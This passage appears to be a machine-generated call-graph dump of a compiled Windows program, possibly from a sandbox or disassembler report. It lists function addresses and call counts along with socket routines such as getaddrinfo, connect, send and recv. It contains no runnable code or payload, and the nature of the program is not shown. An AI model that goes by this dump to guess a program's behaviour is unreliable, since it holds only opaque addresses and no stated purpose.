174190 1469fa0 19 API calls 174189->174190 174190->174178 174192 1478219 174191->174192 174194 1478221 174191->174194 174204 1494830 174192->174204 174194->174159 174196 143d07b 174195->174196 174432 143cee0 174196->174432 174198 143d087 174199 14d88d1 _ValidateLocalCookies 5 API calls 174198->174199 174200 143d09e 174199->174200 174200->174159 174201->174159 174202->174159 174203->174189 174211 1494860 174204->174211 174205 14948b9 174205->174194 174206 14948bb 174206->174205 174208 14943c0 19 API calls 174206->174208 174209 14948d6 174208->174209 174209->174205 174248 147ff50 174209->174248 174211->174205 174211->174206 174212 147ff50 13 API calls 174211->174212 174213 14943c0 174211->174213 174212->174211 174269 1494100 174213->174269 174215 149443f 174217 1494481 174215->174217 174218 14944a2 174215->174218 174240 1494505 174215->174240 174216 14d88d1 _ValidateLocalCookies 5 API calls 174219 1494689 174216->174219 174220 14d88d1 _ValidateLocalCookies 5 API calls 174217->174220 174222 144e850 19 API calls 174218->174222 174226 149450d 174218->174226 174219->174211 174221 149449e 174220->174221 174221->174211 174223 14944c7 174222->174223 174224 14944cd 174223->174224 174223->174226 174333 143b5f0 18 API calls 174224->174333 174227 14945e9 174226->174227 174228 14945bb 174226->174228 174334 143b5f0 18 API calls 174227->174334 174230 1494718 174228->174230 174231 1494733 174228->174231 174337 143b5f0 18 API calls 174230->174337 174233 143d020 18 API calls 174231->174233 174234 1494757 174233->174234 174310 148cd30 174234->174310 174236 14945f7 174236->174240 174247 149480a 174236->174247 174335 144f7a0 19 API calls 174236->174335 174238 149462e 174238->174240 174336 144f950 17 API calls 174238->174336 174239 149479d 174241 14947e5 174239->174241 174338 14768c0 19 API calls _ValidateLocalCookies 174239->174338 174240->174216 174241->174236 174339 1478700 13 API calls 174241->174339 174242 149477c 174242->174239 174245 143b080 12 API calls 174242->174245 174245->174239 174247->174211 174424 143f2a0 174248->174424 174250 1480003 174251 143b080 12 API calls 174250->174251 174252 148000c 174251->174252 174254 1480028 174252->174254 174255 143b080 12 API calls 174252->174255 174256 1480061 174254->174256 174431 1478960 13 API calls 174254->174431 174255->174252 174258 143b080 12 API calls 174256->174258 174259 148006a 174258->174259 174260 1480082 174259->174260 174262 143b080 12 API calls 174259->174262 174263 143b080 12 API calls 174260->174263 174262->174259 174264 148009b 174263->174264 174266 14800c5 174264->174266 174268 143b080 12 API calls 174264->174268 174265 147ff99 174265->174250 174267 143b080 12 API calls 174265->174267 174429 14a08c0 13 API calls 174265->174429 174430 146d200 13 API calls 174265->174430 174266->174205 174267->174265 174268->174264 174270 14941ce 174269->174270 174271 1494142 174269->174271 174273 149423a 174270->174273 174274 14941dc 174270->174274 174304 14942bc 174270->174304 174272 1494179 174271->174272 174275 1494197 174271->174275 174340 143b5f0 18 API calls 174271->174340 174276 14d88d1 _ValidateLocalCookies 5 API calls 174272->174276 174282 14942ed 174273->174282 174300 149424e 174273->174300 174278 14941e9 174274->174278 174279 1494322 174274->174279 174291 14d88d1 _ValidateLocalCookies 5 API calls 174275->174291 174281 1494193 174276->174281 174277 14d88d1 _ValidateLocalCookies 5 API calls 174283 14943b4 174277->174283 174286 149433d 174278->174286 174341 143b5f0 18 API calls 174278->174341 174288 14d88d1 _ValidateLocalCookies 5 API calls 174279->174288 174281->174215 174284 1494371 174282->174284 174285 14942f3 174282->174285 174283->174215 174284->174304 174356 1494070 18 API calls 174284->174356 174285->174279 174285->174286 174355 143b5f0 18 API calls 174285->174355 174296 14d88d1 _ValidateLocalCookies 5 API calls 174286->174296 174287 149416f 174287->174272 174287->174275 174290 1494339 174288->174290 174290->174215 174293 14941ca 174291->174293 174292 1494211 174292->174286 174295 149421f 174292->174295 174293->174215 174298 14d88d1 _ValidateLocalCookies 5 API calls 174295->174298 174299 149436d 174296->174299 174297 1494318 174297->174279 174297->174286 174301 1494236 174298->174301 174299->174215 174303 14942b0 174300->174303 174307 14942c1 174300->174307 174309 14942dd 174300->174309 174301->174215 174302 145d550 19 API calls 174302->174304 174342 145d550 174303->174342 174304->174277 174307->174309 174354 1494070 18 API calls 174307->174354 174309->174302 174311 148cd75 174310->174311 174312 148cd79 174311->174312 174325 148cda9 __Getcvt 174311->174325 174313 14d88d1 _ValidateLocalCookies 5 API calls 174312->174313 174314 148cda5 174313->174314 174314->174242 174315 148d129 174316 148d1bf 174315->174316 174422 145b7a0 19 API calls 174315->174422 174318 143b080 12 API calls 174316->174318 174323 148d1d7 174316->174323 174318->174323 174319 14d88d1 _ValidateLocalCookies 5 API calls 174321 148d2ee 174319->174321 174320 148d26e __Wcsxfrm 174320->174319 174321->174242 174323->174320 174327 143ac50 13 API calls 174323->174327 174324 143b3d0 13 API calls 174324->174325 174325->174315 174325->174324 174328 148d137 174325->174328 174330 143b080 12 API calls 174325->174330 174332 1494100 19 API calls 174325->174332 174415 1458b20 13 API calls __Getcvt 174325->174415 174416 145ed10 174325->174416 174420 145b7a0 19 API calls 174325->174420 174327->174320 174328->174315 174421 145b7a0 19 API calls 174328->174421 174330->174325 174332->174325 174333->174240 174334->174236 174335->174238 174336->174240 174337->174236 174338->174241 174340->174287 174341->174292 174343 145d55d 174342->174343 174344 145d564 174342->174344 174343->174304 174346 145d56a 174344->174346 174347 145d5c2 174344->174347 174357 145b7a0 19 API calls 174344->174357 174346->174304 174348 145d5ec 174347->174348 174349 145d5d9 174347->174349 174352 14b6500 13 API calls 174348->174352 174358 14b6500 174349->174358 174351 145d5e5 174351->174304 174353 145d5fc 174352->174353 174353->174304 174354->174309 174355->174297 174356->174304 174357->174347 174359 14b6a8e 174358->174359 174361 14b6518 174358->174361 174359->174351 174361->174359 174397 14b6ab0 174361->174397 174362 14b6552 174401 14b6220 174362->174401 174364 14b661c 174365 14b662c 174364->174365 174366 147ff50 13 API calls 174364->174366 174405 14a4ee0 174365->174405 174366->174365 174370 14b6559 174370->174364 174371 143b080 12 API calls 174370->174371 174371->174370 174372 14b67cf 174373 143b080 12 API calls 174372->174373 174374 14b67ea 174373->174374 174376 143b080 12 API calls 174374->174376 174384 14b6816 174374->174384 174375 14b688b 174379 143b080 12 API calls 174375->174379 174376->174374 174377 14b6735 174377->174372 174383 143b080 12 API calls 174377->174383 174378 14b663d 174378->174377 174381 143b080 12 API calls 174378->174381 174380 14b68a6 174379->174380 174382 143b080 12 API calls 174380->174382 174387 14b68d2 174380->174387 174381->174378 174382->174380 174383->174377 174384->174375 174385 143b080 12 API calls 174384->174385 174385->174384 174386 14b6937 174389 14b69b0 174386->174389 174390 143b080 12 API calls 174386->174390 174387->174386 174388 143b080 12 API calls 174387->174388 174388->174386 174392 14b6a04 174389->174392 174393 143b080 12 API calls 174389->174393 174390->174389 174391 14b6a7b 174395 143b080 12 API calls 174391->174395 174392->174391 174394 143b080 12 API calls 174392->174394 174393->174392 174394->174391 174396 14b6a84 174395->174396 174396->174351 174398 14b6ace 174397->174398 174399 1478700 13 API calls 174398->174399 174400 14b6b72 174398->174400 174399->174400 174400->174362 174402 14b6286 174401->174402 174403 14b622d 174401->174403 174402->174370 174403->174402 174404 143b080 12 API calls 174403->174404 174404->174403 174406 14a4ef9 174405->174406 174407 14a4f7a 174405->174407 174406->174407 174408 143b080 12 API calls 174406->174408 174409 1478540 174407->174409 174408->174406 174410 147855d 174409->174410 174411 1478615 __Getcvt 174409->174411 174410->174411 174412 143b080 12 API calls 174410->174412 174413 143b080 12 API calls 174411->174413 174414 147865e 174411->174414 174412->174410 174413->174414 174414->174378 174415->174325 174417 145ed22 174416->174417 174419 145ed28 174417->174419 174423 1458b20 13 API calls __Getcvt 174417->174423 174419->174325 174420->174325 174421->174315 174422->174316 174423->174419 174425 143b080 12 API calls 174424->174425 174428 143f2b6 174425->174428 174426 143f2e1 174426->174265 174427 143b080 12 API calls 174427->174428 174428->174426 174428->174427 174429->174265 174430->174265 174431->174254 174433 143cef5 174432->174433 174434 143cf79 174432->174434 174433->174434 174435 143cf13 174433->174435 174436 143cf22 174433->174436 174434->174198 174437 143b3d0 13 API calls 174435->174437 174438 143ac50 13 API calls 174436->174438 174439 143cf20 __Wcsxfrm 174436->174439 174437->174439 174438->174439 174439->174198 174440 14b6000 174441 14b6089 174440->174441 174444 14b6012 174440->174444 174445 14b5e10 174441->174445 174443 14b6099 174446 14b5e2b 174445->174446 174447 14b5e37 174445->174447 174446->174443 174448 14b5e4b 174447->174448 174450 143b080 12 API calls 174447->174450 174449 14b5e96 174448->174449 174451 143ac50 13 API calls 174448->174451 174449->174443 174450->174448 174451->174449 174452 142078d 174454 142079b _AnonymousOriginator 174452->174454 174453 1420b85 174455 14e4fe0 messages 13 API calls 174453->174455 174454->174453 174459 14207ff _AnonymousOriginator 174454->174459 174456 1420b8a 174455->174456 174738 1437370 28 API calls 4 library calls 174456->174738 174458 1420bb1 174460 14da47e CallUnexpected RaiseException 174458->174460 174488 1410ee0 174459->174488 174462 1420bc5 174460->174462 174464 14e4fe0 messages 13 API calls 174462->174464 174463 1420893 174523 14230b0 174463->174523 174465 1420bca 174464->174465 174466 14e4fe0 messages 13 API calls 174465->174466 174468 1420bcf 174466->174468 174469 14208da 174469->174456 174470 14208e5 _AnonymousOriginator 174469->174470 174470->174465 174471 142092a 174470->174471 174473 142095e 174470->174473 174536 1418940 174471->174536 174475 14230b0 28 API calls 174473->174475 174483 1420997 _AnonymousOriginator 174475->174483 174483->174462 174484 142094d _AnonymousOriginator 174483->174484 174484->174465 174485 1420b5a _AnonymousOriginator 174484->174485 174486 14d88d1 _ValidateLocalCookies 5 API calls 174485->174486 174487 1420b7e 174486->174487 174489 1410f35 174488->174489 174739 140dca0 WSAStartup 174489->174739 174491 1410f45 174492 1411381 174491->174492 174494 1410fff _AnonymousOriginator 174491->174494 174493 14e4fe0 messages 13 API calls 174492->174493 174495 1411386 174493->174495 174859 1423290 174494->174859 174496 14e4fe0 messages 13 API calls 174495->174496 174498 141138b 174496->174498 174499 14e4fe0 messages 13 API calls 174498->174499 174500 1411390 174499->174500 174879 140f200 13 API calls 2 library calls 174500->174879 174502 14113ab 174504 14113b1 WSACleanup 174502->174504 174505 14113b7 174502->174505 174503 1411110 _AnonymousOriginator 174866 1424300 174503->174866 174504->174505 174505->174463 174506 1411082 174506->174495 174506->174503 174508 1411140 174509 1411164 Sleep 174508->174509 174513 14111ca _AnonymousOriginator 174508->174513 174510 1411183 174509->174510 174512 1410ee0 128 API calls 174510->174512 174514 14111bc 174512->174514 174513->174498 174871 140f460 174513->174871 174514->174513 174516 1411248 _AnonymousOriginator 174516->174498 174878 140f200 13 API calls 2 library calls 174516->174878 174517 1411299 174518 14112a2 WSACleanup 174517->174518 174520 14112a8 _AnonymousOriginator 174517->174520 174518->174520 174519 1411356 _AnonymousOriginator 174521 14d88d1 _ValidateLocalCookies 5 API calls 174519->174521 174520->174498 174520->174519 174522 1411378 174521->174522 174522->174463 174524 14230e0 174523->174524 174525 1423129 174523->174525 174526 1423112 174524->174526 175350 14282f0 28 API calls CatchIt 174524->175350 175349 14280f0 28 API calls 4 library calls 174525->175349 174526->174469 174529 1423152 174531 14da47e CallUnexpected RaiseException 174529->174531 174530 142316d 175351 14283d0 28 API calls 4 library calls 174530->175351 174531->174524 174533 1423185 174534 14da47e CallUnexpected RaiseException 174533->174534 174535 1423196 174534->174535 174535->174469 174537 141896f 174536->174537 175352 1427dc0 174537->175352 174738->174458 174740 140dd80 174739->174740 174741 140dcf7 174739->174741 174745 14da47e CallUnexpected RaiseException 174740->174745 174742 140dd59 WSACleanup 174741->174742 174744 140dd08 174741->174744 174743 140dd6f 174742->174743 174746 14da47e CallUnexpected RaiseException 174743->174746 175082 14264d0 29 API calls 6 library calls 174744->175082 174751 140dda3 174745->174751 174746->174740 174748 140dd38 174749 14d88d1 _ValidateLocalCookies 5 API calls 174748->174749 174750 140dd53 174749->174750 174750->174491 174753 140deca 174751->174753 174754 140de41 CatchIt 174751->174754 174880 1432360 174751->174880 174757 14e4fe0 messages 13 API calls 174753->174757 174754->174753 174755 140dea0 _AnonymousOriginator 174754->174755 174756 14d88d1 _ValidateLocalCookies 5 API calls 174755->174756 174758 140dec4 174756->174758 174759 140ded4 174757->174759 174758->174491 174893 140b350 174759->174893 174761 140df56 174762 140dff7 getaddrinfo 174761->174762 174763 140f128 WSAGetLastError 174762->174763 174764 140e015 174762->174764 174769 140f141 174763->174769 174775 140e09b 174764->174775 175083 1425350 28 API calls 2 library calls 174764->175083 174767 140e12f 174768 140e13d socket 174767->174768 174771 140f106 174767->174771 174773 140f16a WSAGetLastError 174768->174773 174774 140e16d ioctlsocket 174768->174774 174770 14da47e CallUnexpected RaiseException 174769->174770 174770->174773 175092 140ca60 174771->175092 174776 140f182 174773->174776 174778 140f193 174774->174778 174779 140e18d 174774->174779 174898 140d180 174775->174898 174783 14da47e CallUnexpected RaiseException 174776->174783 175097 140cca0 closesocket 174778->175097 174782 140e1aa __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 174779->174782 174788 140b350 2 API calls 174779->174788 174785 140e218 connect 174782->174785 174783->174778 174784 140f19e WSAGetLastError 174789 140f1b6 174784->174789 174787 140e237 WSAGetLastError 174785->174787 174804 140e25f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 174785->174804 174786 14da47e CallUnexpected RaiseException 174786->174763 174790 140e2f2 174787->174790 174791 140e248 connect 174787->174791 174788->174782 174793 14da47e CallUnexpected RaiseException 174789->174793 174792 140e2fb WSAGetLastError 174790->174792 174790->174804 174791->174787 174791->174804 174794 140e30a 174792->174794 174795 140e35f WSAGetLastError 174792->174795 174793->174795 175065 140cb50 174794->175065 174807 140e354 174795->174807 174798 140cb50 30 API calls 174803 140e37d send 174798->174803 174799 140cb50 30 API calls 174805 140e51c recv 174799->174805 174801 140b350 2 API calls 174852 140e3e4 _AnonymousOriginator __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z CatchIt 174801->174852 174802 140b350 2 API calls 174802->174804 174803->174804 174806 140e394 WSAGetLastError 174803->174806 174804->174798 174804->174802 174804->174807 174811 140e48f WSAGetLastError 174804->174811 174804->174852 174805->174852 174806->174804 174808 140e3a1 send 174806->174808 174810 14da47e CallUnexpected RaiseException 174807->174810 174808->174804 174808->174806 174809 140e540 WSAGetLastError 174812 140e54d recv 174809->174812 174809->174852 174814 140f1e6 174810->174814 174811->174807 174812->174809 174812->174852 174813 142cea0 28 API calls 174813->174852 174818 14e4fe0 messages 13 API calls 174814->174818 174815 140f0f5 WSAGetLastError 174815->174807 174816 140f03b _AnonymousOriginator 174816->174814 174817 140f460 13 API calls 174816->174817 174819 140f095 closesocket 174817->174819 174834 140f1f0 _AnonymousOriginator 174818->174834 174820 140f0a7 _AnonymousOriginator 174819->174820 174820->174814 174820->174815 174821 140ef31 _AnonymousOriginator 174821->174814 174822 140f460 13 API calls 174821->174822 174823 140ef89 closesocket 174822->174823 174825 140ef9b 174823->174825 174826 140efdd freeaddrinfo 174823->174826 174825->174814 174827 140efbe _AnonymousOriginator 174825->174827 174828 140eeba 174826->174828 174827->174826 174832 14d88d1 _ValidateLocalCookies 5 API calls 174828->174832 174829 140effb 175090 140ccb0 26 API calls 2 library calls 174829->175090 174830 14e4fe0 messages 13 API calls 174833 140f457 174830->174833 174837 140eed1 174832->174837 174834->174830 174842 140f433 _AnonymousOriginator 174834->174842 174835 140edf7 _AnonymousOriginator 174835->174814 174836 140f460 13 API calls 174835->174836 174839 140ee51 closesocket 174836->174839 174837->174491 174840 140ee63 174839->174840 174841 140eea5 freeaddrinfo 174839->174841 174840->174814 174843 140ee86 _AnonymousOriginator 174840->174843 174841->174828 174842->174491 174843->174841 174845 140f01b 175091 140ccb0 26 API calls 2 library calls 174845->175091 174847 140eeda 175088 140f630 26 API calls 2 library calls 174847->175088 174848 140ecfb _AnonymousOriginator 174848->174814 174849 140f460 13 API calls 174848->174849 174850 140ed4d closesocket 174849->174850 174853 140eda1 freeaddrinfo 174850->174853 174854 140ed5f 174850->174854 174851 140ef11 175089 140ccb0 26 API calls 2 library calls 174851->175089 174852->174799 174852->174801 174852->174809 174852->174813 174852->174814 174852->174815 174852->174816 174852->174821 174852->174829 174852->174835 174852->174845 174852->174847 174852->174848 174852->174851 175084 1427210 28 API calls 2 library calls 174852->175084 175085 14273f0 29 API calls 4 library calls 174852->175085 175086 1424240 14 API calls 3 library calls 174852->175086 175087 1428640 28 API calls 2 library calls 174852->175087 174853->174828 174854->174814 174857 140ed82 _AnonymousOriginator 174854->174857 174857->174853 174860 14232fb 174859->174860 174865 142330c 174859->174865 174862 14233a2 174860->174862 175348 1425350 28 API calls 2 library calls 174860->175348 174861 14d88d1 _ValidateLocalCookies 5 API calls 174863 142339c 174861->174863 174863->174506 174865->174861 174867 1424356 _AnonymousOriginator 174866->174867 174868 142430a 174866->174868 174867->174508 174868->174867 174869 14e4fe0 messages 13 API calls 174868->174869 174870 142437e 174869->174870 174873 140f46a _AnonymousOriginator 174871->174873 174872 1424300 13 API calls 174874 140f4b0 174872->174874 174873->174872 174873->174874 174875 140f4d4 _AnonymousOriginator 174874->174875 174876 14e4fe0 messages 13 API calls 174874->174876 174875->174516 174877 140f4f9 174876->174877 174878->174517 174879->174502 174881 1432372 174880->174881 174882 14323a1 174880->174882 174883 14323d0 Concurrency::cancel_current_task 174881->174883 174884 1432379 174881->174884 174885 14323be 174882->174885 174888 14d8ada collate 27 API calls 174882->174888 174886 143237f 174883->174886 174887 14d8ada collate 27 API calls 174884->174887 174885->174754 174889 14e4fe0 messages 13 API calls 174886->174889 174892 1432388 174886->174892 174887->174886 174890 14323ab 174888->174890 174891 14323da 174889->174891 174890->174754 174892->174754 175098 14c3241 QueryPerformanceFrequency 174893->175098 174895 140b361 175099 14c322a QueryPerformanceCounter 174895->175099 174897 140b36d __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 174897->174761 174899 140d206 174898->174899 174900 140dbb3 174899->174900 174901 140d20e 174899->174901 174902 140ca60 26 API calls 174900->174902 174905 140d217 174901->174905 175299 1426040 29 API calls CatchIt 174901->175299 174904 140dbc3 174902->174904 174906 140dbd4 174904->174906 174907 14da47e CallUnexpected RaiseException 174904->174907 175100 142aa30 174905->175100 174908 14e4fe0 messages 13 API calls 174906->174908 174907->174906 174909 140dbf7 174908->174909 174911 14e4fe0 messages 13 API calls 174909->174911 174914 140dc01 _AnonymousOriginator 174911->174914 174912 140d299 _AnonymousOriginator 174912->174906 174913 140d36b _AnonymousOriginator 174912->174913 174919 140d3e3 174913->174919 175300 1428640 28 API calls 2 library calls 174913->175300 174915 140dc78 _AnonymousOriginator 174914->174915 174916 14e4fe0 messages 13 API calls 174914->174916 174915->174767 174917 140dc9c WSAStartup 174916->174917 174921 140dd80 174917->174921 174922 140dcf7 174917->174922 175105 1402c80 174919->175105 174927 14da47e CallUnexpected RaiseException 174921->174927 174924 140dd59 WSACleanup 174922->174924 174926 140dd08 174922->174926 174925 140dd6f 174924->174925 174928 14da47e CallUnexpected RaiseException 174925->174928 175318 14264d0 29 API calls 6 library calls 174926->175318 174933 140dda3 174927->174933 174928->174921 174930 140d41f 174944 140d48d _AnonymousOriginator 174930->174944 175301 1428640 28 API calls 2 library calls 174930->175301 174931 140dd38 174934 14d88d1 _ValidateLocalCookies 5 API calls 174931->174934 174936 140deca 174933->174936 174937 1432360 28 API calls 174933->174937 174941 140de41 CatchIt 174933->174941 174935 140dd53 174934->174935 174935->174767 174940 14e4fe0 messages 13 API calls 174936->174940 174937->174941 174938 140dea0 _AnonymousOriginator 174939 14d88d1 _ValidateLocalCookies 5 API calls 174938->174939 174943 140dec4 174939->174943 174947 140ded4 174940->174947 174941->174936 174941->174938 174943->174767 174946 140d558 CatchIt 174944->174946 174971 140d72d _AnonymousOriginator 174944->174971 175302 1428be0 174944->175302 174951 140d5a9 _AnonymousOriginator 174946->174951 175315 1428e40 28 API calls 4 library calls 174946->175315 174948 140b350 2 API calls 174947->174948 174954 140df56 174948->174954 175316 1426160 28 API calls _ValidateLocalCookies 174951->175316 174952 140d663 174953 142aa30 28 API calls 174952->174953 174956 140d679 174953->174956 174955 140dff7 getaddrinfo 174954->174955 174957 140e015 174955->174957 174958 140f128 WSAGetLastError 174955->174958 174956->174971 175317 1428640 28 API calls 2 library calls 174956->175317 174975 140e09b 174957->174975 175319 1425350 28 API calls 2 library calls 174957->175319 174966 140f141 174958->174966 174960 140d180 70 API calls 174963 140e12f 174960->174963 174961 140d7d8 _AnonymousOriginator 174961->174909 174967 1432360 28 API calls 174961->174967 174973 140dac8 CatchIt 174961->174973 174964 140e13d socket 174963->174964 174969 140f106 174963->174969 174972 140f16a WSAGetLastError 174964->174972 174974 140e16d ioctlsocket 174964->174974 174968 14da47e CallUnexpected RaiseException 174966->174968 174967->174973 174968->174972 174977 140ca60 26 API calls 174969->174977 175109 140cd50 174971->175109 174976 140f182 174972->174976 175285 142cea0 174973->175285 174978 140f193 174974->174978 174979 140e18d 174974->174979 174975->174960 174987 14da47e CallUnexpected RaiseException 174976->174987 174983 140f11a 174977->174983 175328 140cca0 closesocket 174978->175328 174985 140e1aa __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 174979->174985 174994 140b350 2 API calls 174979->174994 174980 140db81 _AnonymousOriginator 174981 1424300 13 API calls 174980->174981 174986 140db93 174981->174986 174990 14da47e CallUnexpected RaiseException 174983->174990 174984 140db15 _AnonymousOriginator 174984->174909 174984->174980 174989 140e218 connect 174985->174989 174991 14d88d1 _ValidateLocalCookies 5 API calls 174986->174991 174987->174978 174988 140f19e WSAGetLastError 174993 140f1b6 174988->174993 174992 140e237 WSAGetLastError 174989->174992 175010 140e25f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 174989->175010 174990->174958 174995 140dbac 174991->174995 174996 140e2f2 174992->174996 174997 140e248 connect 174992->174997 174999 14da47e CallUnexpected RaiseException 174993->174999 174994->174985 174995->174767 174998 140e2fb WSAGetLastError 174996->174998 174996->175010 174997->174992 174997->175010 175000 140e30a 174998->175000 175001 140e35f WSAGetLastError 174998->175001 174999->175001 175002 140cb50 30 API calls 175000->175002 175013 140e354 175001->175013 175006 140e320 getsockopt 175002->175006 175004 140cb50 30 API calls 175009 140e37d send 175004->175009 175005 140cb50 30 API calls 175011 140e51c recv 175005->175011 175006->175001 175006->175010 175007 140b350 2 API calls 175058 140e3e4 _AnonymousOriginator __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z CatchIt 175007->175058 175008 140b350 2 API calls 175008->175010 175009->175010 175012 140e394 WSAGetLastError 175009->175012 175010->175004 175010->175008 175010->175013 175017 140e48f WSAGetLastError 175010->175017 175010->175058 175011->175058 175012->175010 175014 140e3a1 send 175012->175014 175016 14da47e CallUnexpected RaiseException 175013->175016 175014->175010 175014->175012 175015 140e540 WSAGetLastError 175018 140e54d recv 175015->175018 175015->175058 175020 140f1e6 175016->175020 175017->175013 175018->175015 175018->175058 175019 142cea0 28 API calls 175019->175058 175024 14e4fe0 messages 13 API calls 175020->175024 175021 140f0f5 WSAGetLastError 175021->175013 175022 140f03b _AnonymousOriginator 175022->175020 175023 140f460 13 API calls 175022->175023 175025 140f095 closesocket 175023->175025 175040 140f1f0 _AnonymousOriginator 175024->175040 175026 140f0a7 _AnonymousOriginator 175025->175026 175026->175020 175026->175021 175027 140ef31 _AnonymousOriginator 175027->175020 175028 140f460 13 API calls 175027->175028 175029 140ef89 closesocket 175028->175029 175031 140ef9b 175029->175031 175032 140efdd freeaddrinfo 175029->175032 175031->175020 175033 140efbe _AnonymousOriginator 175031->175033 175034 140eeba 175032->175034 175033->175032 175038 14d88d1 _ValidateLocalCookies 5 API calls 175034->175038 175035 140effb 175326 140ccb0 26 API calls 2 library calls 175035->175326 175036 14e4fe0 messages 13 API calls 175039 140f457 175036->175039 175043 140eed1 175038->175043 175040->175036 175048 140f433 _AnonymousOriginator 175040->175048 175041 140edf7 _AnonymousOriginator 175041->175020 175042 140f460 13 API calls 175041->175042 175045 140ee51 closesocket 175042->175045 175043->174767 175046 140ee63 175045->175046 175047 140eea5 freeaddrinfo 175045->175047 175046->175020 175049 140ee86 _AnonymousOriginator 175046->175049 175047->175034 175048->174767 175049->175047 175051 140f01b 175327 140ccb0 26 API calls 2 library calls 175051->175327 175053 140eeda 175324 140f630 26 API calls 2 library calls 175053->175324 175054 140ecfb _AnonymousOriginator 175054->175020 175055 140f460 13 API calls 175054->175055 175056 140ed4d closesocket 175055->175056 175059 140eda1 freeaddrinfo 175056->175059 175060 140ed5f 175056->175060 175057 140ef11 175325 140ccb0 26 API calls 2 library calls 175057->175325 175058->175005 175058->175007 175058->175015 175058->175019 175058->175020 175058->175021 175058->175022 175058->175027 175058->175035 175058->175041 175058->175051 175058->175053 175058->175054 175058->175057 175320 1427210 28 API calls 2 library calls 175058->175320 175321 14273f0 29 API calls 4 library calls 175058->175321 175322 1424240 14 API calls 3 library calls 175058->175322 175323 1428640 28 API calls 2 library calls 175058->175323 175059->175034 175060->175020 175063 140ed82 _AnonymousOriginator 175060->175063 175063->175059 175067 140cb8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 175065->175067 175066 140cbb6 select 175068 140cc2f 175066->175068 175074 140cbef 175066->175074 175067->175066 175070 140cc33 175068->175070 175071 140cc4f 175068->175071 175079 140cc70 175068->175079 175069 140cbf5 WSAGetLastError 175069->175068 175069->175074 175075 14d88d1 _ValidateLocalCookies 5 API calls 175070->175075 175347 140ccb0 26 API calls 2 library calls 175071->175347 175073 140cc5f 175076 14da47e CallUnexpected RaiseException 175073->175076 175074->175069 175077 140cc11 select 175074->175077 175078 140cc49 getsockopt 175075->175078 175076->175079 175077->175068 175077->175069 175078->174795 175078->174804 175080 14da47e CallUnexpected RaiseException 175079->175080 175081 140cc95 175080->175081 175082->174748 175083->174775 175084->174852 175085->174852 175086->174852 175087->174852 175088->174807 175089->174807 175090->174807 175091->174807 175093 14da21c ___std_exception_copy 26 API calls 175092->175093 175094 140ca97 175093->175094 175095 14d88d1 _ValidateLocalCookies 5 API calls 175094->175095 175096 140caad 175095->175096 175096->174786 175097->174784 175098->174895 175099->174897 175101 142aab8 175100->175101 175104 142aa4a __Wcsxfrm CatchIt 175100->175104 175329 1430700 28 API calls 4 library calls 175101->175329 175103 142aaca 175103->174912 175104->174912 175106 1402ca0 175105->175106 175107 14d88d1 _ValidateLocalCookies 5 API calls 175106->175107 175108 1402cf1 175107->175108 175108->174930 175119 140cdd2 _AnonymousOriginator CatchIt 175109->175119 175143 140d132 175109->175143 175110 140d149 175111 140ca60 26 API calls 175110->175111 175112 140d162 175111->175112 175113 14da47e CallUnexpected RaiseException 175112->175113 175114 140d170 175113->175114 175115 140dbb3 175114->175115 175116 140d20e 175114->175116 175117 140ca60 26 API calls 175115->175117 175121 140d217 175116->175121 175330 1426040 29 API calls CatchIt 175116->175330 175120 140dbc3 175117->175120 175119->175110 175132 1428be0 28 API calls 175119->175132 175140 140d150 175119->175140 175119->175143 175122 140dbd4 175120->175122 175123 14da47e CallUnexpected RaiseException 175120->175123 175126 142aa30 28 API calls 175121->175126 175124 14e4fe0 messages 13 API calls 175122->175124 175123->175122 175125 140dbf7 175124->175125 175127 14e4fe0 messages 13 API calls 175125->175127 175130 140d299 _AnonymousOriginator 175126->175130 175128 140dc01 _AnonymousOriginator 175127->175128 175131 140dc78 _AnonymousOriginator 175128->175131 175133 14e4fe0 messages 13 API calls 175128->175133 175129 140d36b _AnonymousOriginator 175136 140d3e3 175129->175136 175331 1428640 28 API calls 2 library calls 175129->175331 175130->175122 175130->175129 175131->174961 175132->175119 175134 140dc9c WSAStartup 175133->175134 175138 140dd80 175134->175138 175139 140dcf7 175134->175139 175141 1402c80 5 API calls 175136->175141 175147 14da47e CallUnexpected RaiseException 175138->175147 175142 140dd59 WSACleanup 175139->175142 175146 140dd08 175139->175146 175145 14e4fe0 messages 13 API calls 175140->175145 175150 140d41f 175141->175150 175144 140dd6f 175142->175144 175143->174961 175148 14da47e CallUnexpected RaiseException 175144->175148 175145->175110 175336 14264d0 29 API calls 6 library calls 175146->175336 175153 140dda3 175147->175153 175148->175138 175164 140d48d _AnonymousOriginator 175150->175164 175332 1428640 28 API calls 2 library calls 175150->175332 175151 140dd38 175154 14d88d1 _ValidateLocalCookies 5 API calls 175151->175154 175156 140deca 175153->175156 175157 1432360 28 API calls 175153->175157 175161 140de41 CatchIt 175153->175161 175155 140dd53 175154->175155 175155->174961 175160 14e4fe0 messages 13 API calls 175156->175160 175157->175161 175158 140dea0 _AnonymousOriginator 175159 14d88d1 _ValidateLocalCookies 5 API calls 175158->175159 175163 140dec4 175159->175163 175167 140ded4 175160->175167 175161->175156 175161->175158 175162 140cd50 70 API calls 175181 140d7d8 _AnonymousOriginator 175162->175181 175163->174961 175165 1428be0 28 API calls 175164->175165 175166 140d558 CatchIt 175164->175166 175191 140d72d _AnonymousOriginator 175164->175191 175165->175166 175171 140d5a9 _AnonymousOriginator 175166->175171 175333 1428e40 28 API calls 4 library calls 175166->175333 175168 140b350 2 API calls 175167->175168 175174 140df56 175168->175174 175334 1426160 28 API calls _ValidateLocalCookies 175171->175334 175172 140d663 175173 142aa30 28 API calls 175172->175173 175176 140d679 175173->175176 175175 140dff7 getaddrinfo 175174->175175 175177 140e015 175175->175177 175178 140f128 WSAGetLastError 175175->175178 175176->175191 175335 1428640 28 API calls 2 library calls 175176->175335 175195 140e09b 175177->175195 175337 1425350 28 API calls 2 library calls 175177->175337 175186 140f141 175178->175186 175180 140d180 70 API calls 175183 140e12f 175180->175183 175181->175125 175187 1432360 28 API calls 175181->175187 175193 140dac8 CatchIt 175181->175193 175184 140e13d socket 175183->175184 175189 140f106 175183->175189 175192 140f16a WSAGetLastError 175184->175192 175194 140e16d 